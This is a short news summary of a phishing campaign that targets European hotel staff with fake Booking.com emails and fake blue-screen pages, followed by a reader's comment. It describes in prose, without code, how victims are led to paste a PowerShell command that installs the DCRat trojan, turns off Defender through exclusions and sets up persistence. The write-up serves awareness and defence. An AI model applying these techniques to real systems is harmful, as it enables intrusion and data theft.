Cybersecurity researchers recently identified a campaign named PHALT#BLYX that uses fake blue screen of death errors to target the European hospitality sector. This multi-stage attack tricks victims into executing malicious commands that ultimately install the DCRat remote access trojan on their systems.
The attack begins when a hospitality employee receives a phishing email that appears to be from Booking.com regarding a canceled reservation. This email directs the recipient to a fraudulent website where they encounter a fake CAPTCHA and a simulated system error screen. The page instructs the user to open a Windows command prompt and paste a specific string of code to fix the issue, which in reality triggers a PowerShell script that initiates the infection.
Once the command is executed, a multi-step delivery process begins by downloading an MSBuild project file from a remote server. This file uses legitimate Windows system tools to bypass security protocols and configure Microsoft Defender Antivirus to ignore the malicious activity. If the malware lacks high-level administrative permissions, it is programmed to repeatedly harass the user with authorization prompts until they finally grant access out of frustration.
GET 50% Discount for VPN/ANTIVIRUS SOFTWARE AT 911Cyber - CODE: bit5025
While the malware installs itself in the background, the script automatically opens the genuine Booking.com administrative portal in the victim’s browser. This serves as a distraction to make the user believe the initial email and the subsequent fix were legitimate parts of their workflow. Meanwhile, the DCRat payload establishes persistence in the system startup folder, ensuring the attackers maintain access even if the computer is restarted.
DCRat is a modular tool that allows hackers to steal sensitive data, log keystrokes, and execute remote commands on the compromised machine. Because the campaign utilizes room charge details in Euros and contains Russian language elements within its source code, experts believe it is specifically designed to target European organizations by Russian-linked threat actors. This sophisticated use of trusted system binaries highlights an evolving trend of using legitimate software to hide malicious behavior.
Source: Fake Booking Emails Lure Hotel Staff To BSoD Pages Spreading DCRat
Solid breakdown of the PHALT#BLYX campaign. The fake BSoD to trick users into running PowerShell commands is clever social engineering because it weaponizes the exact moment people are already stressed and looking for a quick fix. Back when I worked IT support, I saw how easily panicked users will copypaste anything if it looks like an official solution, which is exactly what makes thisattack effective.